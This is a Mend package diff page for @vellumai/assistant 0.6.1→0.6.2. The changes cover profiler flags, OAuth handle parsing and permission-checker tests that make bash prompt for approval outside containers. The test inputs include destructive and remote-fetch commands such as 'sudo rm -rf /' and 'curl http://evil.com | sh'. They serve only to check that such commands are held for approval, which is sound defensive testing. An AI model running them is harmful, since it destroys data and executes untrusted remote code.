npm - @vellumai/assistant - Versions diffs - 0.6.1 → 0.6.2 - Mend

@vellumai/assistant 0.6.1 → 0.6.2

This diff compares the contents of two publicly available versions of the package, as released to one of the supported registries. It is provided for informational purposes only and reflects the changes between those versions as they appear in their respective public registries.

Files changed (115)

package/docker-entrypoint.sh +12 -2
package/node_modules/@vellumai/ces-contracts/src/handles.ts +7 -9
package/openapi.yaml +1 -1
package/package.json +1 -1
package/src/__tests__/assistant-event-hub.test.ts +30 -0
package/src/__tests__/checker.test.ts +104 -170
package/src/__tests__/cli-command-risk-guard.test.ts +1 -1
package/src/__tests__/context-overflow-approval.test.ts +5 -5
package/src/__tests__/conversation-analysis-routes.test.ts +169 -0
package/src/__tests__/conversation-directories-parse.test.ts +105 -0
package/src/__tests__/credential-execution-approval-bridge.test.ts +0 -2
package/src/__tests__/init-feature-flag-overrides.test.ts +167 -0
package/src/__tests__/inline-command-runner.test.ts +7 -5
package/src/__tests__/log-export-workspace.test.ts +190 -0
package/src/__tests__/managed-credential-catalog-cli.test.ts +12 -14
package/src/__tests__/navigate-settings-tab.test.ts +14 -1
package/src/__tests__/notification-broadcaster.test.ts +65 -0
package/src/__tests__/onboarding-template-contract.test.ts +5 -4
package/src/__tests__/pkb-autoinject.test.ts +96 -0
package/src/__tests__/require-fresh-approval.test.ts +0 -2
package/src/__tests__/sandbox-diagnostics.test.ts +1 -32
package/src/__tests__/terminal-sandbox.test.ts +1 -1
package/src/__tests__/terminal-tools.test.ts +2 -5
package/src/__tests__/test-preload.ts +14 -0
package/src/__tests__/tool-domain-event-publisher.test.ts +0 -1
package/src/__tests__/tool-executor-lifecycle-events.test.ts +1 -8
package/src/__tests__/tool-executor.test.ts +0 -1
package/src/__tests__/transport-hints-queue.test.ts +77 -0
package/src/__tests__/trust-store.test.ts +4 -4
package/src/__tests__/workspace-migration-030-seed-pkb-autoinject.test.ts +168 -0
package/src/__tests__/workspace-policy.test.ts +2 -7
package/src/agent/loop.ts +0 -29
package/src/channels/types.ts +5 -0
package/src/cli/__tests__/run-assistant-command.ts +34 -7
package/src/cli/__tests__/unknown-command.test.ts +33 -0
package/src/cli/commands/default-action.ts +68 -1
package/src/cli/commands/oauth/__tests__/connect.test.ts +27 -0
package/src/cli/commands/oauth/connect.ts +11 -0
package/src/cli/commands/platform/__tests__/connect.test.ts +1 -1
package/src/cli/commands/platform/__tests__/disconnect.test.ts +1 -1
package/src/cli/commands/platform/__tests__/status.test.ts +1 -1
package/src/cli/program.ts +9 -2
package/src/config/assistant-feature-flags.ts +59 -55
package/src/config/bundled-skills/app-builder/SKILL.md +87 -4
package/src/config/bundled-skills/gmail/SKILL.md +11 -6
package/src/config/bundled-skills/gmail/TOOLS.json +1 -1
package/src/config/bundled-skills/gmail/tools/gmail-sender-digest.ts +2 -1
package/src/config/bundled-skills/settings/TOOLS.json +1 -1
package/src/config/bundled-skills/settings/tools/navigate-settings-tab.ts +8 -3
package/src/config/feature-flag-registry.json +2 -2
package/src/config/schemas/services.ts +8 -0
package/src/credential-execution/approval-bridge.ts +0 -1
package/src/credential-execution/managed-catalog.ts +3 -7
package/src/daemon/config-watcher.ts +6 -2
package/src/daemon/context-overflow-approval.ts +0 -1
package/src/daemon/conversation-agent-loop.ts +33 -12
package/src/daemon/conversation-attachments.ts +0 -1
package/src/daemon/conversation-messaging.ts +3 -0
package/src/daemon/conversation-process.ts +18 -2
package/src/daemon/conversation-queue-manager.ts +8 -0
package/src/daemon/conversation-runtime-assembly.ts +64 -7
package/src/daemon/conversation-surfaces.ts +65 -0
package/src/daemon/conversation-tool-setup.ts +0 -3
package/src/daemon/conversation.ts +3 -5
package/src/daemon/handlers/conversations.ts +2 -1
package/src/daemon/handlers/shared.ts +7 -0
package/src/daemon/lifecycle.ts +21 -1
package/src/daemon/message-types/conversations.ts +4 -0
package/src/daemon/message-types/messages.ts +0 -1
package/src/daemon/message-types/notifications.ts +12 -0
package/src/daemon/message-types/settings.ts +12 -0
package/src/daemon/server.ts +21 -24
package/src/daemon/transport-hints.ts +33 -0
package/src/index.ts +1 -1
package/src/memory/conversation-crud.ts +15 -10
package/src/memory/conversation-directories.ts +39 -0
package/src/memory/conversation-group-migration.ts +65 -5
package/src/memory/embedding-local.ts +1 -1
package/src/memory/graph/capability-seed.ts +3 -5
package/src/memory/group-crud.ts +25 -9
package/src/messaging/provider.ts +1 -1
package/src/notifications/broadcaster.ts +6 -0
package/src/notifications/conversation-pairing.ts +12 -4
package/src/notifications/emit-signal.ts +14 -0
package/src/notifications/signal.ts +11 -0
package/src/oauth/platform-connection.test.ts +2 -2
package/src/oauth/seed-providers.ts +1 -0
package/src/permissions/checker.ts +3 -3
package/src/permissions/defaults.ts +7 -8
package/src/permissions/prompter.ts +0 -2
package/src/platform/client.ts +1 -1
package/src/prompts/templates/BOOTSTRAP.md +14 -5
package/src/prompts/templates/SOUL.md +11 -11
package/src/runtime/assistant-event-hub.ts +22 -0
package/src/runtime/auth/token-service.ts +8 -0
package/src/runtime/routes/conversation-analysis-routes.ts +18 -6
package/src/runtime/routes/conversation-routes.ts +9 -3
package/src/runtime/routes/group-routes.ts +22 -8
package/src/runtime/routes/log-export/AGENTS.md +104 -0
package/src/runtime/routes/log-export/__tests__/workspace-allowlist-error-contract.test.ts +103 -0
package/src/runtime/routes/log-export/__tests__/workspace-allowlist.test.ts +716 -0
package/src/runtime/routes/log-export/workspace-allowlist.ts +458 -0
package/src/runtime/routes/log-export-routes.ts +18 -3
package/src/skills/inline-command-runner.ts +12 -14
package/src/tools/permission-checker.ts +0 -18
package/src/tools/secret-detection-handler.ts +0 -1
package/src/tools/skills/sandbox-runner.ts +3 -6
package/src/tools/terminal/sandbox-diagnostics.ts +4 -4
package/src/tools/terminal/sandbox.ts +4 -1
package/src/tools/terminal/shell.ts +3 -5
package/src/tools/types.ts +0 -3
package/src/watcher/provider-types.ts +1 -1
package/src/workspace/migrations/029-seed-pkb.ts +1 -0
package/src/workspace/migrations/030-seed-pkb-autoinject.ts +73 -0
package/src/workspace/migrations/registry.ts +2 -0

package/docker-entrypoint.sh CHANGED Viewed

@@ -16,19 +16,29 @@ BUN_OPTIONS="${BUN_OPTIONS:-}"
 if [ -n "${VELLUM_PROFILER_RUN_ID:-}" ] && [ -n "${VELLUM_PROFILER_MODE:-}" ]; then
   PROFILER_WORKSPACE="${VELLUM_WORKSPACE_DIR:-$HOME/.vellum/workspace}"
   PROFILER_RUN_DIR="${PROFILER_WORKSPACE}/data/profiler/runs/${VELLUM_PROFILER_RUN_ID}"
+  PROFILER_HEAP_DIR="${PROFILER_RUN_DIR}"
   # Ensure the run directory exists
   mkdir -p "${PROFILER_RUN_DIR}"
+  # Bun resolves heap profile output more reliably when the directory is
+  # expressed relative to the current working directory.
+  if command -v realpath >/dev/null 2>&1; then
+    PROFILER_HEAP_DIR="$(
+      realpath --relative-to="$(pwd)" "${PROFILER_RUN_DIR}" 2>/dev/null ||
+        printf '%s' "${PROFILER_RUN_DIR}"
+    )"
+  fi
   case "${VELLUM_PROFILER_MODE}" in
     cpu)
       BUN_OPTIONS="${BUN_OPTIONS} --cpu-prof --cpu-prof-md --cpu-prof-dir=${PROFILER_RUN_DIR}"
       ;;
     heap)
-      BUN_OPTIONS="${BUN_OPTIONS} --heap-prof --heap-prof-md --heap-prof-dir=${PROFILER_RUN_DIR}"
+      BUN_OPTIONS="${BUN_OPTIONS} --heap-prof --heap-prof-md --heap-prof-dir=${PROFILER_HEAP_DIR}"
       ;;
     cpu+heap|heap+cpu)
-      BUN_OPTIONS="${BUN_OPTIONS} --cpu-prof --cpu-prof-md --cpu-prof-dir=${PROFILER_RUN_DIR} --heap-prof --heap-prof-md --heap-prof-dir=${PROFILER_RUN_DIR}"
+      BUN_OPTIONS="${BUN_OPTIONS} --cpu-prof --cpu-prof-md --cpu-prof-dir=${PROFILER_RUN_DIR} --heap-prof --heap-prof-md --heap-prof-dir=${PROFILER_HEAP_DIR}"
       ;;
     *)
       echo "Warning: unknown VELLUM_PROFILER_MODE '${VELLUM_PROFILER_MODE}', skipping profiler flags" >&2

package/node_modules/@vellumai/ces-contracts/src/handles.ts CHANGED Viewed

@@ -146,14 +146,12 @@ export function parseHandle(raw: string): ParseHandleResult {
     }
     case HandleType.LocalOAuth: {
-      // providerKey is typically a bare name (e.g. "google"), but legacy handles
-      // may contain a colon (e.g. "integration:google"), so we split on the
-      // *last* "/" to separate providerKey from connectionId.
-      const lastSlashIdx = rest.lastIndexOf("/");
+      // Split providerKey from connectionId.
+      const slashIdx = rest.indexOf("/");
       if (
-        lastSlashIdx === -1 ||
-        lastSlashIdx === 0 ||
-        lastSlashIdx === rest.length - 1
+        slashIdx === -1 ||
+        slashIdx === 0 ||
+        slashIdx === rest.length - 1
       ) {
         return {
           ok: false,
@@ -164,8 +162,8 @@ export function parseHandle(raw: string): ParseHandleResult {
         ok: true,
         handle: {
           type: HandleType.LocalOAuth,
-          providerKey: rest.slice(0, lastSlashIdx),
-          connectionId: rest.slice(lastSlashIdx + 1),
+          providerKey: rest.slice(0, slashIdx),
+          connectionId: rest.slice(slashIdx + 1),
           raw,
         },
       };

package/openapi.yaml CHANGED Viewed

@@ -3,7 +3,7 @@
 openapi: 3.0.0
 info:
   title: Vellum Assistant API
-  version: 0.6.0
+  version: 0.6.1
   description: Auto-generated OpenAPI specification for the Vellum Assistant runtime HTTP server.
 servers:
   - url: http://127.0.0.1:7821

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "@vellumai/assistant",
-  "version": "0.6.1",
+  "version": "0.6.2",
   "license": "MIT",
   "type": "module",
   "exports": {

package/src/__tests__/assistant-event-hub.test.ts CHANGED Viewed

@@ -102,6 +102,36 @@ describe("AssistantEventHub — fanout", () => {
     const hub = new AssistantEventHub();
     await expect(hub.publish(makeEvent())).resolves.toBeUndefined();
   });
+  test("hasSubscribersForEvent returns true for assistant-wide subscribers", () => {
+    const hub = new AssistantEventHub();
+    hub.subscribe({ assistantId: "ast_1" }, () => {});
+    expect(
+      hub.hasSubscribersForEvent({
+        assistantId: "ast_1",
+        conversationId: "sess_A",
+      }),
+    ).toBe(true);
+  });
+  test("hasSubscribersForEvent honors conversation scoping", () => {
+    const hub = new AssistantEventHub();
+    hub.subscribe({ assistantId: "ast_1", conversationId: "sess_A" }, () => {});
+    expect(
+      hub.hasSubscribersForEvent({
+        assistantId: "ast_1",
+        conversationId: "sess_A",
+      }),
+    ).toBe(true);
+    expect(
+      hub.hasSubscribersForEvent({
+        assistantId: "ast_1",
+        conversationId: "sess_B",
+      }),
+    ).toBe(false);
+  });
 });
 // ── Unsubscribe / cleanup ────────────────────────────────────────────────────

package/src/__tests__/checker.test.ts CHANGED Viewed

@@ -48,14 +48,12 @@ mock.module("../util/logger.js", () => ({
 interface TestConfig {
   permissions: { mode: "strict" | "workspace" };
   skills: { load: { extraDirs: string[] } };
-  sandbox: { enabled: boolean };
   [key: string]: unknown;
 }
 const testConfig: TestConfig = {
   permissions: { mode: "workspace" },
   skills: { load: { extraDirs: [] } },
-  sandbox: { enabled: true },
 };
 mock.module("../config/loader.js", () => ({
@@ -640,49 +638,23 @@ describe("Permission Checker", () => {
   // ── check (decision logic) ─────────────────────────────────────
   describe("check", () => {
-    test("sandbox bash auto-allows all risk levels via default rule", async () => {
-      // High risk
+    test("bash follows risk-based policy (no default allow rule outside container)", async () => {
+      // High risk → prompt
       const high = await check("bash", { command: "sudo rm -rf /" }, "/tmp");
-      expect(high.decision).toBe("allow");
-      expect(high.matchedRule?.id).toBe("default:allow-bash-global");
+      expect(high.decision).toBe("prompt");
-      // Medium risk
+      // Medium risk → prompt
       const med = await check(
         "bash",
         { command: "curl https://example.com" },
         "/tmp",
       );
-      expect(med.decision).toBe("allow");
-      expect(med.matchedRule?.id).toBe("default:allow-bash-global");
+      expect(med.decision).toBe("prompt");
-      // Low risk
+      // Low risk → auto-allowed via risk-based fallback
       const low = await check("bash", { command: "ls" }, "/tmp");
       expect(low.decision).toBe("allow");
-      expect(low.matchedRule?.id).toBe("default:allow-bash-global");
-    });
-    test("bash prompts when sandbox is disabled (no global allow rule)", async () => {
-      testConfig.sandbox.enabled = false;
-      clearCache();
-      try {
-        const high = await check("bash", { command: "sudo rm -rf /" }, "/tmp");
-        expect(high.decision).toBe("prompt");
-        const med = await check(
-          "bash",
-          { command: "curl https://example.com" },
-          "/tmp",
-        );
-        expect(med.decision).toBe("prompt");
-        // Low risk still auto-allows via the normal risk-based fallback
-        const low = await check("bash", { command: "ls" }, "/tmp");
-        expect(low.decision).toBe("allow");
-        expect(low.reason).toContain("Low risk");
-      } finally {
-        testConfig.sandbox.enabled = true;
-        clearCache();
-      }
+      expect(low.reason).toContain("Low risk");
     });
     test("host_bash high risk → always prompt", async () => {
@@ -2337,11 +2309,11 @@ describe("Permission Checker", () => {
   // ── strict mode: no implicit allow (PR 21) ───────────────────
   describe("strict mode — no implicit allow (PR 21)", () => {
-    test("sandbox bash auto-allows in strict mode (default rule is a matching rule)", async () => {
+    test("bash prompts in strict mode (no default allow rule outside container)", async () => {
       testConfig.permissions.mode = "strict";
       const result = await check("bash", { command: "ls" }, "/tmp");
-      expect(result.decision).toBe("allow");
-      expect(result.matchedRule?.id).toBe("default:allow-bash-global");
+      expect(result.decision).toBe("prompt");
+      expect(result.reason).toContain("Strict mode");
     });
     test("host_bash prompts low risk in strict mode (default ask rule matches)", async () => {
@@ -2462,10 +2434,9 @@ describe("Permission Checker", () => {
       expect(result.decision).toBe("prompt");
     });
-    test("sandbox bash auto-allows high-risk via default allowHighRisk rule", async () => {
+    test("bash prompts for high-risk without default allow rule", async () => {
       const result = await check("bash", { command: "sudo rm -rf /" }, "/tmp");
-      expect(result.decision).toBe("allow");
-      expect(result.matchedRule?.id).toBe("default:allow-bash-global");
+      expect(result.decision).toBe("prompt");
     });
     test("medium-risk tool with allow rule is NOT affected by allowHighRisk", async () => {
@@ -3657,11 +3628,11 @@ describe("Permission Checker", () => {
     //    explicit matching rule. ──────────────────────────────────────
     describe("Invariant 1: strict mode requires explicit matching rule for every tool", () => {
-      test("sandbox bash auto-allows in strict mode (default rule matches)", async () => {
+      test("bash prompts in strict mode (no default allow rule outside container)", async () => {
         testConfig.permissions.mode = "strict";
         const result = await check("bash", { command: "echo hello" }, "/tmp");
-        expect(result.decision).toBe("allow");
-        expect(result.matchedRule?.id).toBe("default:allow-bash-global");
+        expect(result.decision).toBe("prompt");
+        expect(result.reason).toContain("Strict mode");
       });
       test("low-risk host_bash prompts in strict mode (default ask rule matches)", async () => {
@@ -3709,15 +3680,14 @@ describe("Permission Checker", () => {
         expect(result.reason).toContain("Strict mode");
       });
-      test("high-risk sandbox bash auto-allows in strict mode (default allowHighRisk rule)", async () => {
+      test("high-risk bash prompts in strict mode (no default allow rule outside container)", async () => {
         testConfig.permissions.mode = "strict";
         const result = await check(
           "bash",
           { command: "sudo apt update" },
           "/tmp",
         );
-        expect(result.decision).toBe("allow");
-        expect(result.matchedRule?.id).toBe("default:allow-bash-global");
+        expect(result.decision).toBe("prompt");
       });
       test("high-risk host_bash command with no user rule prompts in strict mode", async () => {
@@ -4130,20 +4100,39 @@ describe("Permission Checker", () => {
     test("getDefaultRuleTemplates tolerates partial config mocks", () => {
       const originalSkills = testConfig.skills;
-      const originalSandbox = testConfig.sandbox;
       try {
         testConfig.skills = {} as any;
-        testConfig.sandbox = {} as any;
         const templates = getDefaultRuleTemplates();
         expect(Array.isArray(templates)).toBe(true);
         expect(templates.some((t) => t.id.includes("extra-"))).toBe(false);
+        // bash allow rule is conditional on IS_CONTAINERIZED, not present in test env
         expect(
           templates.some((t) => t.id === "default:allow-bash-global"),
-        ).toBe(true);
+        ).toBe(false);
       } finally {
         testConfig.skills = originalSkills;
-        testConfig.sandbox = originalSandbox;
+      }
+    });
+    test("getDefaultRuleTemplates includes bash allow rule when IS_CONTAINERIZED", () => {
+      const orig = process.env.IS_CONTAINERIZED;
+      process.env.IS_CONTAINERIZED = "true";
+      try {
+        const templates = getDefaultRuleTemplates();
+        const bashRule = templates.find(
+          (t) => t.id === "default:allow-bash-global",
+        );
+        expect(bashRule).toBeDefined();
+        expect(bashRule!.tool).toBe("bash");
+        expect(bashRule!.pattern).toBe("**");
+        expect(bashRule!.allowHighRisk).toBe(true);
+      } finally {
+        if (orig === undefined) {
+          delete process.env.IS_CONTAINERIZED;
+        } else {
+          process.env.IS_CONTAINERIZED = orig;
+        }
       }
     });
   });
@@ -4407,13 +4396,14 @@ describe("bash network_mode=proxied — risk capped at medium", () => {
     testConfig.skills = { load: { extraDirs: [] } };
   });
-  test("proxied bash follows normal rules (auto-allowed by default rule)", async () => {
+  test("proxied bash follows risk-based policy (medium risk → prompt outside container)", async () => {
     const result = await check(
       "bash",
       { command: "curl https://api.example.com", network_mode: "proxied" },
       "/tmp",
     );
-    expect(result.decision).toBe("allow");
+    // Without the containerized bash allow rule, proxied medium-risk bash prompts
+    expect(result.decision).toBe("prompt");
   });
   test("proxied bash caps high-risk commands to medium", async () => {
@@ -4427,7 +4417,8 @@ describe("bash network_mode=proxied — risk capped at medium", () => {
   test("pipe to python3 -c is not high risk (inline code, not stdin exec)", async () => {
     const risk = await classifyRisk("bash", {
-      command: 'cat data.json | python3 -c "import sys; print(sys.stdin.read())"',
+      command:
+        'cat data.json | python3 -c "import sys; print(sys.stdin.read())"',
     });
     expect(risk).toBe(RiskLevel.Low);
   });
@@ -4439,7 +4430,7 @@ describe("bash network_mode=proxied — risk capped at medium", () => {
     expect(risk).toBe(RiskLevel.High);
   });
-  test("proxied bash with high-risk command is auto-allowed by default rule", async () => {
+  test("proxied bash with high-risk command prompts (medium risk cap, no default allow rule)", async () => {
     const result = await check(
       "bash",
       {
@@ -4448,7 +4439,8 @@ describe("bash network_mode=proxied — risk capped at medium", () => {
       },
       "/tmp",
     );
-    expect(result.decision).toBe("allow");
+    // High risk capped to medium by proxied mode, but still prompts without the bash allow rule
+    expect(result.decision).toBe("prompt");
   });
   test("host_bash with network_mode=proxied follows normal flow", async () => {
@@ -4676,8 +4668,8 @@ describe("scope matching behavior", () => {
       { command: "npm install" },
       "/home/user/other-project",
     );
-    // npm install is Low risk, so it falls through to auto-allow via the
-    // default sandbox bash rule, not via the project-scoped rule.
+    // npm install is Low risk, so it's auto-allowed via the risk-based
+    // fallback, not via the project-scoped rule.
     // The key assertion is that the project-scoped rule is NOT the matched rule.
     if (result.matchedRule) {
       expect(result.matchedRule.scope).not.toBe(projectDir);
@@ -4759,79 +4751,37 @@ describe("workspace mode — auto-allow workspace-scoped operations", () => {
     expect(result.reason).toContain("Low risk");
   });
-  // ── bash (sandbox) — default rule matches, workspace mode not reached ──
+  // ── bash (non-containerized) — workspace auto-allow blocked, risk-based fallback ──
-  test("bash in workspace with sandbox (non-proxied) → allow via default rule", async () => {
+  test("bash in workspace (low risk) → allow via risk-based fallback, not workspace mode", async () => {
     const result = await check("bash", { command: "ls -la" }, workspaceDir);
     expect(result.decision).toBe("allow");
-    // Allowed via the default sandbox bash rule, not workspace mode
-    expect(result.matchedRule?.id).toBe("default:allow-bash-global");
-  });
-  // ── bash sandbox gate — workspace auto-allow depends on sandbox being enabled ──
-  test("bash with sandbox disabled in workspace mode → falls through to risk-based policy (not auto-allowed)", async () => {
-    const origSandbox = testConfig.sandbox.enabled;
-    testConfig.sandbox.enabled = false;
-    try {
-      const result = await check(
-        "bash",
-        { command: "echo hello" },
-        workspaceDir,
-      );
-      // Should NOT be auto-allowed via workspace mode
-      expect(result.reason).not.toContain("Workspace mode");
-      // With sandbox disabled, no default bash allow rule either, so it falls through to risk-based policy
-      expect(result.decision).toBe("allow");
-      expect(result.reason).toContain("Low risk");
-    } finally {
-      testConfig.sandbox.enabled = origSandbox;
-    }
-  });
-  test("bash with sandbox enabled in workspace mode → auto-allowed via default rule", async () => {
-    const origSandbox = testConfig.sandbox.enabled;
-    testConfig.sandbox.enabled = true;
-    try {
-      const result = await check(
-        "bash",
-        { command: "echo hello" },
-        workspaceDir,
-      );
-      expect(result.decision).toBe("allow");
-      // With sandbox enabled, the default bash allow rule matches before workspace mode
-      expect(result.matchedRule?.id).toBe("default:allow-bash-global");
-    } finally {
-      testConfig.sandbox.enabled = origSandbox;
-    }
+    // Not auto-allowed via workspace mode — bash falls through to risk-based policy
+    expect(result.reason).not.toContain("Workspace mode");
+    expect(result.reason).toContain("Low risk");
   });
-  test("bash with sandbox disabled in workspace mode — medium risk command → prompt (not auto-allowed)", async () => {
-    const origSandbox = testConfig.sandbox.enabled;
-    testConfig.sandbox.enabled = false;
-    try {
-      // An unknown program is medium risk; without sandbox, workspace auto-allow is blocked
-      const result = await check(
-        "bash",
-        { command: "some-unknown-program --flag" },
-        workspaceDir,
-      );
-      expect(result.reason).not.toContain("Workspace mode");
-      expect(result.decision).toBe("prompt");
-    } finally {
-      testConfig.sandbox.enabled = origSandbox;
-    }
+  test("bash in workspace (medium risk) → prompt (not auto-allowed)", async () => {
+    // An unknown program is medium risk; without container, workspace auto-allow is blocked
+    const result = await check(
+      "bash",
+      { command: "some-unknown-program --flag" },
+      workspaceDir,
+    );
+    expect(result.reason).not.toContain("Workspace mode");
+    expect(result.decision).toBe("prompt");
   });
   // ── proxied bash — risk capped at medium ──
-  test("bash with network_mode=proxied → allow (risk capped at medium)", async () => {
+  test("bash with network_mode=proxied → prompt (medium risk, not auto-allowed outside container)", async () => {
     const result = await check(
       "bash",
       { command: "curl https://api.example.com", network_mode: "proxied" },
       workspaceDir,
     );
-    expect(result.decision).toBe("allow");
+    // Without container, bash isn't auto-allowed via workspace mode; proxied caps at medium → prompt
+    expect(result.decision).toBe("prompt");
   });
   // ── host tools — default ask rules prompt ──
@@ -4932,24 +4882,17 @@ describe("shell command candidates wiring (PR 04)", () => {
   });
   test("action key rule does not match complex chain with additional action", async () => {
-    // Disable sandbox so the default allow-bash-global rule is not emitted;
-    // otherwise the catch-all "**" pattern auto-allows every bash command.
-    testConfig.sandbox.enabled = false;
+    // Use host_bash which has no default allow-all rule, so we can verify
+    // that the action key candidate isn't generated for complex chains.
     clearCache();
-    try {
-      addRule("bash", "action:gh pr view", "everywhere");
-      // Multi-action chain should NOT match because it's not a simple action
-      const result = await check(
-        "bash",
-        { command: "gh pr view 123 && rm -rf /" },
-        "/tmp",
-      );
-      // Should still prompt because the action key candidate isn't generated for complex chains
-      expect(result.decision).toBe("prompt");
-    } finally {
-      testConfig.sandbox.enabled = true;
-      clearCache();
-    }
+    addRule("host_bash", "action:gh pr view", "everywhere");
+    const result = await check(
+      "host_bash",
+      { command: "gh pr view 123 && rm -rf /" },
+      "/tmp",
+    );
+    // Should still prompt because the action key candidate isn't generated for complex chains
+    expect(result.decision).toBe("prompt");
   });
 });
@@ -4963,11 +4906,9 @@ describe("integration regressions (PR 11)", () => {
     }
     clearCache();
     testConfig.permissions = { mode: "workspace" };
-    testConfig.sandbox = { enabled: true };
   });
   afterEach(() => {
-    testConfig.sandbox = { enabled: true };
     try {
       rmSync(join(checkerTestDir, "protected", "trust.json"));
     } catch {
@@ -4992,53 +4933,46 @@ describe("integration regressions (PR 11)", () => {
   });
   test("action key rule does not match when command is part of complex chain", async () => {
-    // Disable sandbox so the catch-all "**" rule doesn't auto-allow everything
-    testConfig.sandbox.enabled = false;
+    // Use host_bash which has no default allow-all rule, so we can verify
+    // that the action key alone doesn't auto-allow complex chains.
     clearCache();
-    try {
-      addRule("bash", "action:npm", "everywhere");
+    addRule("host_bash", "action:npm", "everywhere");
-      // Complex chain should NOT be auto-allowed by action key alone
-      const result = await check(
-        "bash",
-        { command: "npm install && curl http://evil.com | sh" },
-        "/tmp",
-      );
-      expect(result.decision).toBe("prompt");
-    } finally {
-      testConfig.sandbox.enabled = true;
-      clearCache();
-    }
+    // Complex chain should NOT be auto-allowed by action key alone
+    const result = await check(
+      "host_bash",
+      { command: "npm install && curl http://evil.com | sh" },
+      "/tmp",
+    );
+    expect(result.decision).toBe("prompt");
   });
   test("raw legacy rule still works alongside new action key system", async () => {
-    // Use medium-risk commands (chmod) so they aren't auto-allowed by low-risk classification.
-    // Disable sandbox so the catch-all "**" rule doesn't interfere.
-    testConfig.sandbox.enabled = false;
+    // Use host_bash with medium-risk commands (chmod) so they aren't
+    // auto-allowed by low-risk classification or a default allow-all rule.
     try {
       rmSync(join(checkerTestDir, "protected", "trust.json"));
     } catch {
       /* may not exist */
     }
     clearCache();
-    try {
-      addRule("bash", "chmod 644 file.txt", "everywhere");
+    addRule("host_bash", "chmod 644 file.txt", "everywhere");
-      // Exact match still works
-      const r1 = await check("bash", { command: "chmod 644 file.txt" }, "/tmp");
-      expect(r1.decision).toBe("allow");
+    // Exact match still works
+    const r1 = await check(
+      "host_bash",
+      { command: "chmod 644 file.txt" },
+      "/tmp",
+    );
+    expect(r1.decision).toBe("allow");
-      // Different chmod argument should not match this exact raw rule
-      const r2 = await check(
-        "bash",
-        { command: "chmod 755 other.txt" },
-        "/tmp",
-      );
-      expect(r2.decision).not.toBe("allow");
-    } finally {
-      testConfig.sandbox.enabled = true;
-      clearCache();
-    }
+    // Different chmod argument should not match this exact raw rule
+    const r2 = await check(
+      "host_bash",
+      { command: "chmod 755 other.txt" },
+      "/tmp",
+    );
+    expect(r2.decision).not.toBe("allow");
   });
   test("scope ordering is consistent across tool types", () => {

package/src/__tests__/cli-command-risk-guard.test.ts CHANGED Viewed

@@ -55,7 +55,7 @@ function expectLowRisk(command: string, actual: RiskLevel): void {
 // Dynamically extract subcommand names from the CLI program definition.
 // This ensures new commands added to program.ts are automatically covered
 // by this guard test without manual list maintenance.
-const program = buildCliProgram();
+const program = await buildCliProgram();
 const ASSISTANT_SUBCOMMANDS = program.commands.map((c) => c.name());
 describe("CLI command risk guard: assistant commands", () => {

package/src/__tests__/context-overflow-approval.test.ts CHANGED Viewed

@@ -55,8 +55,8 @@ describe("requestCompressionApproval", () => {
     await requestCompressionApproval(prompter);
     const args = (prompter.prompt as ReturnType<typeof mock>).mock.calls[0];
-    // persistentDecisionsAllowed is index 9
-    expect(args[9]).toBe(false);
+    // persistentDecisionsAllowed is index 8
+    expect(args[8]).toBe(false);
   });
   test("includes a description in the input", async () => {
@@ -119,8 +119,8 @@ describe("requestCompressionApproval", () => {
     });
     const args = (prompter.prompt as ReturnType<typeof mock>).mock.calls[0];
-    // signal is index 10
-    expect(args[10]).toBe(controller.signal);
+    // signal is index 9
+    expect(args[9]).toBe(controller.signal);
   });
   test("works without signal option", async () => {
@@ -130,7 +130,7 @@ describe("requestCompressionApproval", () => {
     const args = (prompter.prompt as ReturnType<typeof mock>).mock.calls[0];
     // signal should be undefined when not provided
-    expect(args[10]).toBeUndefined();
+    expect(args[9]).toBeUndefined();
   });
   // ── Tool name constant ──